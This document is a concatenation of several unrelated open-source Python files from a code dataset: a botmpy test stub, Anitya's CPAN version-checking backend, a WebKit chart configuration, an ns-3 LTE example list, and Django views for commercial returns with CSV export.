# endorse or promote products derived from this Software without specific
# prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# WITH THE SOFTWARE.
#_____________________________________________________________________________
#
# Acknowledgements:
# Philipp Meier <[email protected]>
#_____________________________________________________________________________
#
##---IMPORTS
try:
import unittest2 as ut
except ImportError:
import unittest as ut
from numpy.testing import assert_equal, assert_almost_equal
import scipy as sp
from botmpy.nodes import ArtifactDetectorNode
##---TESTS
class TestArtifactDetectorNode(ut.TestCase):
def setUp(self):
pass
def testArtifactDetector(self):
pass
"""
from os import listdir, path as osp
from spikeplot import mcdata, plt
from botmpy.common import XpdFile
from botmpy.nodes import SDMteoNode as SDET
tf = 65
AD = ArtifactDetectorNode()
SD = SDET(tf=tf, min_dist=int(tf * 0.5))
XPDPATH = '/home/phil/Data/Munk/Louis/L011'
for fname in sorted(filter(lambda x:x.startswith('L011') and
x.endswith('.xpd'),
listdir(XPDPATH)))[:20]:
arc = XpdFile(osp.join(XPDPATH, fname))
data = arc.get_data(item=7)
AD(data)
print AD.events
print AD.get_nonartefact_epochs()
print AD.get_fragmentation()
SD(data)
f = mcdata(data=data, other=SD.energy, events={0:SD.events},
epochs=AD.events, show=False)
for t in SD.threshold:
f.axes[-1].axhline(t)
plt.show()
"""
if __name__ == '__main__':
ut.main()
|
mit
|
release-monitoring/anitya
|
anitya/lib/backends/cpan.py
|
1
|
3710
|
# -*- coding: utf-8 -*-
"""
(c) 2014-2016 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <[email protected]>
Ralph Bean <[email protected]>
"""
import logging
from defusedxml import ElementTree as ET
from anitya.lib.backends import BaseBackend, get_versions_by_regex, REGEX
from anitya.lib.exceptions import AnityaPluginException
_log = logging.getLogger(__name__)
class CpanBackend(BaseBackend):
""" The custom class for projects hosted on CPAN.
This backend allows to specify a version_url and a regex that will
be used to retrieve the version information.
"""
name = "CPAN (perl)"
examples = [
"https://metacpan.org/release/Net-Whois-Raw/",
"https://metacpan.org/release/SOAP/",
]
@classmethod
def get_version(cls, project):
""" Method called to retrieve the latest version of the projects
provided, project that relies on the backend of this plugin.
:arg Project project: a :class:`anitya.db.models.Project` object whose backend
corresponds to the current plugin.
:return: the latest version found upstream
:return type: str
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the version cannot be retrieved correctly
"""
return cls.get_ordered_versions(project)[-1]
@classmethod
def get_version_url(cls, project):
""" Method called to retrieve the url used to check for new version
of the project provided, project that relies on the backend of this plugin.
Attributes:
project (:obj:`anitya.db.models.Project`): Project object whose backend
corresponds to the current plugin.
Returns:
str: url used for version checking
"""
url = "https://metacpan.org/release/%(name)s/" % {"name": project.name}
return url
@classmethod
def get_versions(cls, project):
""" Method called to retrieve all the versions (that can be found)
of the projects provided, project that relies on the backend of
this plugin.
:arg Project project: a :class:`anitya.db.models.Project` object whose backend
corresponds to the current plugin.
:return: a list of all the possible releases found
:return type: list
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the versions cannot be retrieved correctly
"""
url = cls.get_version_url(project)
regex = REGEX % {"name": project.name}
return get_versions_by_regex(url, regex, project)
@classmethod
def check_feed(cls):
""" Return a generator over the latest uploads to CPAN
by querying an RSS feed.
"""
url = "https://metacpan.org/feed/recent"
try:
response = cls.call_url(url)
except Exception: # pragma: no cover
raise AnityaPluginException("Could not contact %s" % url)
try:
root = ET.fromstring(response.text)
except ET.ParseError:
raise AnityaPluginException("No XML returned by %s" % url)
for item in root.iter(tag="{http://purl.org/rss/1.0/}item"):
title = item.find("{http://purl.org/rss/1.0/}title")
try:
name, version = title.text.rsplit("-", 1)
except ValueError:
_log.info("Unable to parse CPAN package %s into a name and version")
homepage = "https://metacpan.org/release/%s/" % name
yield name, homepage, cls.name, version
|
gpl-2.0
|
saisai/phantomjs
|
src/qt/qtwebkit/Tools/QueueStatusServer/config/charts.py
|
122
|
2458
|
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
patch_log_limit = 500
# All units are represented numerically as seconds.
one_minute = 60.0
one_hour = one_minute * 60.0
one_day = one_hour * 24.0
one_month = one_day * 30.0
# How far back to view the history, specified in seconds.
view_range_choices = [
{"name": "1 day", "view_range": one_day},
{"name": "1 week", "view_range": one_day * 7},
{"name": "1 month", "view_range": one_month},
]
default_view_range = one_day
_time_units = [
#(threshold, time unit, name)
(0, one_hour, "hours"),
(4 * one_day, one_day, "days"),
(3 * one_month, one_month, "months"),
]
def get_time_unit(view_range):
current_threshold, current_time_unit, current_name = _time_units[0]
for threshold, time_unit, name in _time_units[1:]:
if view_range >= threshold:
current_time_unit, current_name = time_unit, name
else:
break
return current_time_unit, current_name
|
bsd-3-clause
|
dumbringer/ns-3-dev-ndnSIM
|
src/lte/test/examples-to-run.py
|
151
|
3664
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-
# A list of C++ examples to run in order to ensure that they remain
# buildable and runnable over time. Each tuple in the list contains
#
# (example_name, do_run, do_valgrind_run).
#
# See test.py for more information.
cpp_examples = [
("lena-cqi-threshold", "True", "True"),
("lena-dual-stripe", "True", "True"),
("lena-dual-stripe --simTime=0.0 --nApartmentsX=1 --homeEnbDeploymentRatio=0.5 --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1", "True", "True"),
("lena-dual-stripe --epc=1 --simTime=0.0 --nApartmentsX=1 --homeEnbDeploymentRatio=0.5 --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1", "True", "True"),
("lena-dual-stripe --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --useUdp=0 --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --fadingTrace=../../src/lte/model/fading-traces/fading_trace_EPA_3kmph.fad --simTime=0.01", "True", "True"),
("lena-dual-stripe --nBlocks=1 --nMacroEnbSites=0 --macroUeDensity=0 --homeEnbDeploymentRatio=1 --homeEnbActivationRatio=1 --homeUesHomeEnbRatio=2 --macroEnbTxPowerDbm=0 --simTime=0.01", "True", "True"),
("lena-dual-stripe --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1 --nApartmentsX=4 --nMacroEnbSitesX=0 --homeEnbDeploymentRatio=1 --homeEnbActivationRatio=1 --macroEnbTxPowerDbm=0 --epcDl=1 --epcUl=0 --epc=1 --numBearersPerUe=4 --homeUesHomeEnbRatio=15 --simTime=0.01", "True", "True"),
("lena-fading", "True", "True"),
("lena-gtpu-tunnel", "True", "True"),
("lena-intercell-interference --simTime=0.1", "True", "True"),
("lena-pathloss-traces", "True", "True"),
("lena-profiling", "True", "True"),
("lena-profiling --simTime=0.1 --nUe=2 --nEnb=5 --nFloors=0", "True", "True"),
("lena-profiling --simTime=0.1 --nUe=3 --nEnb=6 --nFloors=1", "True", "True"),
("lena-rlc-traces", "True", "True"),
("lena-rem", "True", "True"),
("lena-rem-sector-antenna", "True", "True"),
("lena-simple", "True", "True"),
("lena-simple-epc", "True", "True"),
("lena-x2-handover", "True", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TtaFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdTbfqFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdMtFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdBetFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::RrFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::PssFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::PfFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdTbfqFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdMtFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdBetFfMacScheduler", "options.valgrind", "True"),
]
# A list of Python examples to run in order to ensure that they remain
# runnable over time. Each tuple in the list contains
#
# (example_name, do_run).
#
# See test.py for more information.
python_examples = []
|
gpl-2.0
|
sztosz/neonet
|
CommercialReturns/views.py
|
1
|
4999
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on 2013-10-11
#
# @author: Bartosz Nowak [email protected]
#
# This file is licensed GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007
from __future__ import unicode_literals
import unicodecsv
from django.contrib.auth import logout
from django.shortcuts import redirect
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponse
from django.views.generic import DetailView, UpdateView, ListView, DeleteView, RedirectView
from neonet.views import LoggedInMixin
import models
import forms
class CommercialReturns(LoggedInMixin, ListView):
queryset = models.CommercialReturn.objects.order_by('-start_date')
template_name = 'CommercialReturns/list.html'
class CommercialReturnDetail(LoggedInMixin, DetailView):
model = models.CommercialReturn
template_name = 'CommercialReturns/detail.html'
context_object_name = 'commercial_return'
def get_context_data(self, **kwargs):
context = super(CommercialReturnDetail, self).get_context_data(**kwargs)
context['commodities'] = models.CommodityInCommercialReturn.objects.filter(commercial_return=self.object.pk)
return context
class CommercialReturnExport(CommercialReturnDetail):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
context = self.get_context_data(object=self.object)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="commercial_return.csv.txt"'
writer = unicodecsv.writer(response, delimiter=b';')
try:
writer.writerow(['Numer: {}'.format(context['commercial_return'].return_number())])
writer.writerow(['Przewoźnik: {}'.format(context['commercial_return'].carrier.name)])
writer.writerow(['Nazwisko kierowcy: {}'.format(context['commercial_return'].driver_name)])
writer.writerow(['Nr rejestracyjny samochodu: {}'.format(context['commercial_return'].car_plates)])
writer.writerow(['Komentarz do przewoźnika: {}'.format(context['commercial_return'].carrier_comment)])
writer.writerow(['Czas trwania: {} - {}'.format(context['commercial_return'].start_date,
context['commercial_return'].end_date)])
writer.writerow(['Kontroler: {} {}'.format(context['commercial_return'].user.first_name,
context['commercial_return'].user.last_name)])
writer.writerow([''])
writer.writerow(['Ilość', 'Towar', 'ean', 'List przewozowy', 'Dokument'])
for row in context['commodities']:
writer.writerow([row.amount, row.commodity, row.commodity.ean, row.waybill, row.document_name()])
except KeyError:
writer.writerow(['Nastąpił błąd parsowania danych: brak towarów w liście'])
return response
class CommercialReturnPrint(CommercialReturnDetail):
template_name = 'CommercialReturns/print.html'
class CommercialReturnUpdate(LoggedInMixin, UpdateView):
model = models.CommercialReturn
template_name = 'CommercialReturns/update.html'
def get_success_url(self):
return reverse('DamageReports:list')
class CommercialReturnClose(LoggedInMixin, RedirectView):
url = reverse_lazy('DamageReports:list')
def get_redirect_url(self, *args, **kwargs):
commercial_return = models.CommercialReturn.objects.get(pk=self.kwargs.get('pk'))
commercial_return.completed = True
commercial_return.save()
return super(CommercialReturnClose, self).get_redirect_url()
class CommercialReturnItemUpdate(LoggedInMixin, UpdateView):
model = models.CommodityInCommercialReturn
template_name = 'CommercialReturns/item_update.html'
form_class = forms.CommercialReturnItem
def get_success_url(self):
return reverse('DamageReports:commercial_return_detail', args=(self.object.commercial_return.pk,))
def get_initial(self):
initial = self.initial.copy()
initial['ean'] = self.get_object().commodity.ean
initial['commercial_return'] = self.get_object().commercial_return.id
return initial
def form_valid(self, form):
commercial_return = models.CommercialReturn.objects.get(pk=form.cleaned_data['commercial_return'])
item = form.save(commit=False)
item.commercial_return = commercial_return
item.save()
return super(CommercialReturnItemUpdate, self).form_valid(form)
class CommercialReturnItemDelete(LoggedInMixin, DeleteView):
model = models.CommodityInCommercialReturn
template_name = 'CommercialReturns/item_delete.html'
def get_success_url(self):
return reverse('DamageReports:detail', args=(self.object.commercial_return.pk,))
def logout_view(request):
logout(request)
return redirect('DamageReports:charts')
|
gpl-3.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.